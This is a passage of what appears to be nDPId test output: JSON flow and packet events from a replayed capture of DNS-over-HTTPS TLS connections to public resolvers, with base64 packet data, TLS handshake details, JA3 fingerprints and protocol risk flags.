BQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDUjoSgwC\/YwRC2sL4\/9W3ATSzLtM\/v84EfifaAhQZfWw=="}
01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946739310697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3154,"pkt_l4_len":3120,"thread_ts_msec":946739310697,"pkt":"ZmZmZmZmRERERERECABFAAxEyD9AADMGLsinctx9CgAAAQHFkpqHTHZeqQiJMFAYAfVQ4wAAFgMDAHoCAAB2AwOMlhGBzZbQdgMB7SlRRNR6aAHyhH11lUBOX85ujHC26yD0eC9rhNsSjRzwJJQFthL\/q1ufnITsbP94aSBdrdhzDxMBAAAuACsAAgMEADMAJAAdACBUUq246Yl+EWhWLEvZvcutMb+IirYuhEzXmLk3lr59QxQDAwABARcDAwAgZrqPXWP2zV85oWOqSEKZV0DzXUfiOwwJJ+C5CgZ1QqEXAwMKFVw16EKwmaYl6UqgM5FDRFEvQkVVdsBwborgCOxUvP2YbrJsHBMovDHHpAcBFTWebPQJMSKasadU094aHDRpLPrxxCjXB2pxM0WIqTvteHWIfU1Fk5\/NpqSuHKzO0Ra3PwdESYixe\/zb6sDdKKc1TRT99VsGnFNvwT\/9kRj6LGAVtWhnVsCfJH598qgWQ0wNsN5\/qg97535WjDSAoptbAHelOwuJgc8mZW87Z778lSdbGSJVYmbS+Kzpu3czloyo+k8tnMR0gAcl1hEQQ49kVF90oJqhnl11GE\/B0nhnrDcMC484Ni2gzPflOc2ve4l75Bv19quG6UuBjAJ+lAILT2sCAli3NgfXnu\/RIxYWHOwg5dkUsitPEbeddf7oCeQEhHZOIe8IWZHCTWJ8Xas6gq1DtDEctxSwxYTmBOPQYJURvi5XAJunxgkYorZ1S5H22PsJbPQoDTXE7jb\/MK+t+sJi\/qLBk\/QTcK+QjjpfOnPOG6kcTfb96PDiNmimFlhI+7qPbHOuBFKP3RlOfNCtE0LR80aRulQJ7mOKrhCqpMkFgCoXo\/4IvZulEfNa6rLjjxU0mGwRO9C\/8SUW\/MWxf9V+fhaFIFLLIrdk9mjlOAh4RTjBuIhZwdSm01OHFabvxJQc5nWUTI8sDv\/4Hth4Nmyyi395Zo\/bIgvPNsPA6YqSbJJPw7TRXj9EpeXABU58rfRMlnEHMcHSeAnr61+lHN29cf2rb7cQuEObxOV+r0Ti2hnTxG1kzZXxUKMf1TJz\/QNCPdFs\/8sc7I75BLceNNdyiMxbhvl0\/mQYkbbTX+E01I4nneSr0YAWi\/dj5OFWkY5oKdT3ijaj5ZnH8mUoUzF6gidtHrJfWLUutNNAVK0ii3hJTxAh53tLa55cziofBXUjER9OxqdXFQX0xk0dW5\/N25Am3sfN4K9G9Or+Mq0ZjCUN\/b\/4AAu5iVdc2xuiywbhKCKv\/+1ba649i2+11N2NuNP4WLerjRdmVgUEXTqjPsE1bvdPpgn\/tgD\/NfJO4snitGVo2fF0AIvoI8ffNDBM8mHNAe\/P4wCN21PuNzrXMiMwd7BKvHy1yaV3bx1ZcbZVsRq2ArQ\/sz1xvbYIM5K\/4uE3U5TUD7iEvNa+H0F0t5Pm3xl9hPFjB8UQZyCzE0eaHFxztuY1AhJrANiSpn9KUApux28hlfmPpxZwwY\/4voaTDNDh4a6l1L\/5bBlTMZQ8ZTPo3KsCc7rYoLRgUBfec4EVT3pXIcfZwnttUMEultj1OSOdAYKMUVl+Ae797PlHj+BPOvQU1JP+1NxmeW9EkPxvKNxTuFB8Ql03lSa0sP7N4iOT4LxwTyM6btUOuFjsDMq5fFh3z8x6u4eDmVvymYi2lDSt123i5VnAGlmqe2vlBnBoLSjRbpHHKNWC14LFSfaclke+Fsk\/LXqRdmrmwoK42FR8QM5yBJ4V4XBtfp1iJayJWXrv2Yp\/Jw2nGI\/8spJXweIKBfFJYNDE+FKqYVx6uY0QURwmsxmAiNbUSW3iE5ptj6f47Bqqzcu614k3woIktKLvq+R5kAUl\/94OeFfc1MDcYQiS1itHZ6WgYMqXlALhkIaagT341vLWH8EINXXu\/JPbuL4ratmRZsOHcAq4Z64Qth7VsN\/NAOgVmBZa9WLc6jmBs+\/7oNewv6pYbinaC9eFjw+AUviDZIoPDTI2cqHtCKNJKtQeYF8JwZdso+kGs0e4hY6Ekh+Gt4QIAdcddPMJiEMdHRRcI7TJwLsTmixFKIFFEmFMcRnAgRce970vQl6+J2m\/3\/zT76RlKTnb6S5cA2Gh1xVWfifqZ+dJJ4S6U8o2kzOx1BcO4lPr6QndhbLXBopt+TnAxhiNVC0jGSLxxKfJsKliuCmauybike5VfhMB74\/Zd9LI0lHZcyjtrJZpkqIdf9mUmq84TeFEVObpfDxeDp9pwfwnzY7CZiAhc8H7X\/B4eL6QPbJJeDvWRsaiMa8MtOGUovwBK\/1RmmRbBs9Ps\/WvCegAP2zZsifFoeWn3IFAPuF2t4F1jzP6KFB2fJjiCF\/xSMUdVX4mSSLxUy6Noq6HH8DTkiTT7i5Rtb6Z+6YPqTrIz0kRUJm8ymK8qGaWvXbafgJW+zAD6LQJ6Uz\/H9ede+fQeVaNdwR2ZGANN93T8+CUOO\/5QCgVylxvI+WkULYljrgmsAHGf2x4K+AdzUNCRbtqqamvoa9+H9TZ6D9K0XHtu60WRh\/xvg+0kvul3oISkBwW\/5VC47CJIkeqDKIcaH28dzjF68bVaWHBCOA\/QVspO8f7PM39uibr2ZI\/9qT7jw8Z+41laurnLDDiiTcv8nIyk9gPkkLpL0gZ8B7RwNepdi9poakmfyvLsu7noykkUZPrrciaDs4AxlMW2SE0l6ggoSXHblXDfGv1qrkJ+wYHqoIpx4Orz9BIDwmFuIK9uApDePCMMJ8COMRLP5+c7CWBbef3qNt43feI9i3DxrqohnnAeDQ5XayaaeIrWeswn\/yTkRhpCGBJsg0rlCy0bwelKJ5jOd0Z6yAeLdgeBTN7mANe1L7262l3N\/TUj4BGdpkUJSKWZ+F5L9xh3ZDx0CN7nut3setCOi4jALV8qZWBwNBsnPw\/1et9Mhz5yQU5W4hKDkIkR0JbpteXZI\/YulIUs304N95S0rMRs+F91Z\/I1bjxYITEBnA3nKgeOqnJG67UQeyBJy3Wot3ZWs1FnfHSinzEDRXoy\/in3NMk3Ee4UJjJJVvh1u1kB0flpae3nwu8yHniwAQeA4V\/IYlytwzxmH9UBxClJ1YaCH4QYvYTNNn4X5yrgDRFy8aRZbx7KFTZjETXMAwD7jXdzFpBRNyur7a5hxwjkpR1nPJHXNHbl9ulhBQraPk64O22lXmWhmTqqJxPCHLTJc8dCW9Tw+MWIDqlSC6iP\/uFGWMugMNTbPpm71YwCV6DE3MM5Iw3r\/pJtSMpVM1czkfmhYfe8YtiZEI64Bh59v3JQ7Geu6i4Q2THuBrvHiZucUzufDS6W\/DBGI9K4\/J9OjIx3bbp4KuEgDSz3alUQX8h9N3c6Ve\/ecJdJcy74VVi6oGyfaHP6IVk7S15X3oTFjfGBcG+hk0a0dR\/W0BGALH+pY8iH726JsGgeEg52jxxJyoyqN2BP+Onsb9VAjI4Axsa9MyFPMa6R4QE78VraMZsIMjQY2e6jOI2lFaIx1i29CS8IB7OY+l9i9GRSJhN1TC+qRidWiZdwiZ6CGxjzCAIjCNtYYMpt94CcLWARqfnvGVuwq7RqWOpW3L6qgDcGRhcwof3dXDPhz02YMhWNSauXVnUXZfqF8vmR+tgeJWIevQpdj5ioEIsT2Um5j+gijjHh859fJLDhzYVmYtQ3TEi737GfFw2SXnggL\/Iy07c7IZEI94AezYiyRdA9+kLWGaO\/dAL2rthXXz37bspZFnOGyuB0KI3G4RabCIXAwMBGcOMNM44BDplKj\/3Ojq4jdtuoD82NTa5b2k5zkFslQd12hFn3q5eB44nkwI465O8I9pSVocWpqU9EbYhTvyK1R8N4URD7Q5PMRg7Umy5tkS2hB9uZLmMl9DoKxlIW+kyr\/KuqeGrCAN583A5M1yhRuOwYF56CIKxvuyChPRKUAt8\/70gOTQjynH\/\/1nGoYgPF\/ta4eVsTLhuzDLb9mQMc16\/4VLa51E7HgIT9to4lg95nWvnMoIyp4a8sRcKKCYU92Ot4xWr0tqEIEu0fXIbk7\/Ta2loRt8FUwirJas4rlQGX1glaJy9RyPTHTwKV9kLdjGIRncOAxHu\/8Q7IfLg2aWJ07\/3naoyq6szJDQTcE3S8LB44P4jJ13NFwMDADUJ1y22teIy1dcIiwJwX4cS160nI55Nkh7bUzq2ftRXjrZxugVJnOhQTCokK54\/+GLzaYeqbw=="}
01090{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310588,"flow_last_seen":946739310697,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":1693,"midstream":1,"thread_ts_msec":946739310697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":946739310700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739310700,"pkt":"REREREREZmZmZmZmCABFAABoz7NAAL0GqS8KAAABp3LcfZKaAcWpCIkwh0yCelAYAfVFBwAAFAMDAAEBFwMDADWIup5ey1m73Olzdr+La\/pgBsOV2156nE0gjo7pkVZbX+HWq3wNBOBZgTPS2Gv4V1H1NoVl6Q=="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":946739310980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739310980,"pkt":"REREREREZmZmZmZmCABFAAFBYCBAAL0GW60KAAABuSuHAZUqAburhCguMeSlTVAYAfYCHQAAFgMBARQBAAEQAwM7gJo4OG7S+iUgpLXTuxo5Xw1OBGj4DiyxVBvpcTjrrSC1ygzgmnU02BGfASVXjVBWPNfoJIqu28ODMXbR4UvXGQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALb2R2ci5uaWMuY3oABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg+HQ6d2TRAhXiPlV4SzYTTgVvyRFR0ttaRH8caXLPDAE="}
00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":946739311016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3057,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3057,"pkt_l4_len":3023,"thread_ts_msec":946739311016,"pkt":"ZmZmZmZmRERERERECABFAAvj5XlAADUGU7K5K4cBCgAAAQG7lSox5KVNq4QpR1AYAO0MvwAAFgMDAGICAABeAwOYp2uqwk2kagwv1bFvuG7BP4gwxFJK\/HnbYlDDBgxtByBtkhDnIYlAH5FeNvmtcy43X+awJKk1khM1gLQ9O4\/1KcAvAAAW\/wEAAQAACwAEAwABAgAQAAUAAwJoMhYDAwn0CwAJ8AAJ7QAFUTCCBU0wggQ1oAMCAQICEgOvzNhD6HsqkMaua9kU943O+TANBgkqhkiG9w0BAQsFADBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMwHhcNMjAwODAzMDY1MzUwWhcNMjAxMTAxMDY1MzUwWjAWMRQwEgYDVQQDEwtvZHZyLm5pYy5jejCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMSBtMaoOIrrVwbIP2cWYEJHSXjqgj\/\/9tkWX5PXpNopleDTdQVoDYtrhgWWdCxKvyghVnCCvqzpAdxH9iHJ+YDCJvMhSONvyUnQC+8wqGClBPGGgWuYJiWCNGWLq05jQxU5OjFamZYLeA83J41w0hXJ0caGVgR+ZmGHFjjdBCJABPqlSZbx4n\/8eqoqwv3W6903WKQrR8zszV5MtKKlTANB6QP2yhXI+UhhzdoeLxrEImAA6gxL2BOHWdKuBhBuV+ph8YRaL5IiMHVdXgcmxhPMtLDMaXcrlQWC6XO\/mVYjsQjycz9NHwfX9HBGmqdB8EpxpqAzOMv4Pfea+srqI+sCAwEAAaOCAl8wggJbMA4GA1UdDwEB\/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYDVR0TAQH\/BAIwADAdBgNVHQ4EFgQUiF81uRjtpDLZWzD7gWIvMHk\/TcYwHwYDVR0jBBgwFoAUqEpqYwR93brm0Tm3pkVl7\/Oo7KEwbwYIKwYBBQUHAQEEYzBhMC4GCCsGAQUFBzABhiJodHRwOi8vb2NzcC5pbnQteDMubGV0c2VuY3J5cHQub3JnMC8GCCsGAQUFBzAChiNodHRwOi8vY2VydC5pbnQteDMubGV0c2VuY3J5cHQub3JnLzAWBgNVHREEDzANggtvZHZyLm5pYy5jejBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQMGCisGAQQB1nkCBAIEgfQEgfEA7wB2AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc7NP+yAAAAQDAEcwRQIhAKJu6NqRyIYQsDPHU\/A2REhgeKHjM4x+XnuUUYMuSVKBAiBvFXWETRjBcg4jaK4iYqlFL3MxxHaFAihU4M5Y1\/QWIQB1AAe3XBvlfWj\/8bDGHSMVx7rmV3xXlLdq7rxhOhpp06IcAAABc7NP+0kAAAQDAEYwRAIgbhSITSEVzSp\/pS3dsOxVrCnCOPr0QsQS\/Z8OeZ0VJL4CIEqFJZjRYER6kq4HNRyZ4yzxaPbu\/njrCFn4rfkG\/MO7MA0GCSqGSIb3DQEBCwUAA4IBAQCGEOIQRUNcWjsX719Aj278yDJZeRktrpYQiEzTApT2VFFAVk9RNpDtIgove0nygMmo0gYcRhVp8veJjqVoyBOpTj8fBZ0k4jHFaDhaRBi5aQXOMln+cU\/N+ZZyxOF\/OvhfMIgmGnNpnX15fmj0DD6pQOeMMvjd9\/6LhaAOIYehc8T\/qnYYgS+NN4PGwZ62L8NBcloKk78UBZkehMmgkPB4R4UGWU+P\/9wBXoct8xHeSEI\/RKypAvQONIxcx+PGOfY7cug8EawYjQxeC0dBrCPA4HuTbflrjLpxCEjs2nsPD4SXJGGl7AoG4paGMGZjt4DcZO2jhWz5unIehkjqEM\/fAASWMIIEkjCCA3qgAwIBAgIQCgFBQgAAAVOFc2oLheynCDANBgkqhkiG9w0BAQsFADA\/MSQwIgYDVQQKExtEaWdpdGFsIFNpZ25hdHVyZSBUcnVzdCBDby4xFzAVBgNVBAMTDkRTVCBSb290IENBIFgzMB4XDTE2MDMxNzE2NDA0NloXDTIxMDMxNzE2NDA0NlowSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnNMM8FrlLke3cl03g7NoYzDq1zUmGSXhvb418XCSL7e4S0EFq6meNQhY7LEqxGiHC6PjdeTm86dicbp5gWAf15Gan\/PQeGdxyGkOlZHP\/uaZ6WA8SMx+yk13EiSdRxta67nsHjcAHJyse6cF6s5K671B5TaYucv9bTyWaN8jKkKQDIZ0Z8h\/pZq4UmEUEz9l6YKHy9v6Dlb2honzhT+Xhq+w3Brvaw2VFn3EK6BlspkENnWAa6xK8xuQSXgvopZPKiAlKQTGdMDQMc2PMTiVFrqoM7hD8bEfwzB\/onkxEz0tNvjj\/PIzark5McWvxI0NHWQWM6r6hCm21AvA2H3DkwIDAQABo4IBfTCCAXkwEgYDVR0TAQH\/BAgwBgEB\/wIBADAOBgNVHQ8BAf8EBAMCAYYwfwYIKwYBBQUHAQEEczBxMDIGCCsGAQUFBzABhiZodHRwOi8vaXNyZy50cnVzdGlkLm9jc3AuaWRlbnRydXN0LmNvbTA7BggrBgEFBQcwAoYvaHR0cDovL2FwcHMuaWRlbnRydXN0LmNvbS9yb290cy9kc3Ryb290Y2F4My5wN2MwHwYDVR0jBBgwFoAUxKexpHsscfrb4UuQdf\/EFWCFiRAwVAYDVR0gBE0wSzAIBgZngQwBAgEwPwYLKwYBBAGC3xMBAQEwMDAuBggrBgEFBQcCARYiaHR0cDovL2Nwcy5yb290LXgxLmxldHNlbmNyeXB0Lm9yZzA8BgNVHR8ENTAzMDGgL6AthitodHRwOi8vY3JsLmlkZW50cnVzdC5jb20vRFNUUk9PVENBWDNDUkwuY3JsMB0GA1UdDgQWBBSoSmpjBH3duubRObemRWXv86jsoTANBgkqhkiG9w0BAQsFAAOCAQEA3TPXEfNjWDjdGBX7CVW+dla5cEilaUcne8IkCJLxWh9KEik3JHRRHGJouM2VcGfl96S8TihRzZvoroed6ti6WqEBmtzw3Wodatg+VyOeph4EYpr\/1wXKtx8\/wApIvJSwtmVi4MFU5aMqrSDE6ea73Mj2tcMyo5jMd6jmeWUHK8so\/joWUoHOUgwuX4Po1QYz+3dszkDqMp4fklxBwXRsW10KXzPMTZ+sOPAveyxindmjkW8lGy+QsRlGPfZ+G6Z6h7mjem0Y+iWlkYcV4PIWL1iwBi8saCbGS5jN2p8M+X+Q7UNKEkROb3N6KOqkqm57TH2H3eDJAkSnh6\/DNFu0QhYDAwFNDAABSQMAF0EE7OwduzycCFyh5foVYUYJfj2csLLoqbmNrs4ksDiqkMaHC2NulFxfST4jcCRZ19YEaLojL5JVRvlluRb8LA6yDQQBAQARbpzNdpCTfHNn9Bz14lNKRHZrsXa4X4EmfyVVEagU6WSCW5UKp3bMis8UAzosg4RFbcIE\/BqKgmQG64Bt\/cGitnxq47bonIC\/OFLylrM320R6R6uLkQuGNQpkUlgrZKL\/+YkYqd4ToLlZjenqQeguYlPWOUvDEduCfvOd+A9y2fcGuSyrbb0En99qwYiK1PUm11WXjEDQ91vzKm5Pz2wWWFYuywvRbHOtLetuqGEfMtz5QTTP+GA2fJf1SHhqAtT7v7XaP+5Wvee65IgIoNU6aiAVYz3hwW\/AkDmTqCcqZ608Q7A+R1MIFZgfnWqkxiaXPHcpFh\/8pcgjckhLtTiSFgMDAAQOAAAA"}
01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310980,"flow_last_seen":946739311016,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":3284,"flow_avg_l4_payload_len":1642,"midstream":1,"thread_ts_msec":946739311016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","server_names":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=odvr.nic.cz","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"15:57:4E:06:5B:3D:23:22:EF:BC:2E:5B:A3:3E:A5:76:BD:14:01:4B"}}
00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":946739311048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":946739311048,"pkt":"REREREREZmZmZmZmCABFAACmYCJAAL0GXEYKAAABuSuHAZUqAburhClHMeSxCFAYAfUBggAAFgMDAEYQAABCQQS+L1tdhkv27psDloITDJmmm+nkuKGJ6kBYeGBEdwUOSK4polbbfA55gXHwNtK3Y1Aq1CUhl++X\/zqhOD+IGqi8FAMDAAEBFgMDACgAAAAAAAAAALayQyzNIxhtoOFefQYzbs\/rDW3NZGb\/HW2xO7qHfaVY"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":946739311335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739311335,"pkt":"REREREREZmZmZmZmCABFAAFF8W5AAL0G+HQKAAABCQkJCso6Abuxr7nkL4f0JVAYAfbUBgAAFgMBARgBAAEUAwN330DAziY7Qy75ow2vvPPweI0WjrfNmIygzjgDJAOaiiBkC+TeFnwD\/kQWoA8NwSkWiR\/ZS3JD6l8yhQXJVgAa3gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG5zMTAucXVhZDkubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AICW+8u6SZcrHjrKSceEpWhhd\/sXKRaui0Qq2OMNRWOwf"}
00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":946739311357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739311357,"pkt":"ZmZmZmZmRERERERECABFAAXUEqtAADsGVKoJCQkKCgAAAQG7yjovh\/Qlsa+7AVAQAHdneAAAFgMDAHoCAAB2AwPsHFeUVovCXmWpA4VyNoqF1JeqKqRwRROYqOPJU94DoSBkC+TeFnwD\/kQWoA8NwSkWiR\/ZS3JD6l8yhQXJVgAa3hMCAAAuACsAAgMEADMAJAAdACBGm95D7Gx83XoeinRk1rxGpZA8u1buvy6HtAvs0UM2ZxQDAwABARcDAwAgBCGr5NOssVZ7TUX4BrL7MyB6aRLwiu1feUb2m7o8fLYXAwMKaD942IoOSpCliO6ZHVfN+ruurWUvz7jYgeJjK7SV5aPdpOPU+gCK34wDZjZp50dMaIsg77NAx4MrmJU6wTsTAwZldztvUMpws2wEYMHKWN686r\/ZugmuzBYB3tOPhjCMvk8pBO5Z4lVJQc9Hb1RsJ03QnqO\/EjZsCDIJr3EwAdBfauIjY3hi6AzlRf9VL9JoUREwghpYtzQDH4RvKScS6ISuIZ0qtqLTaSpG1r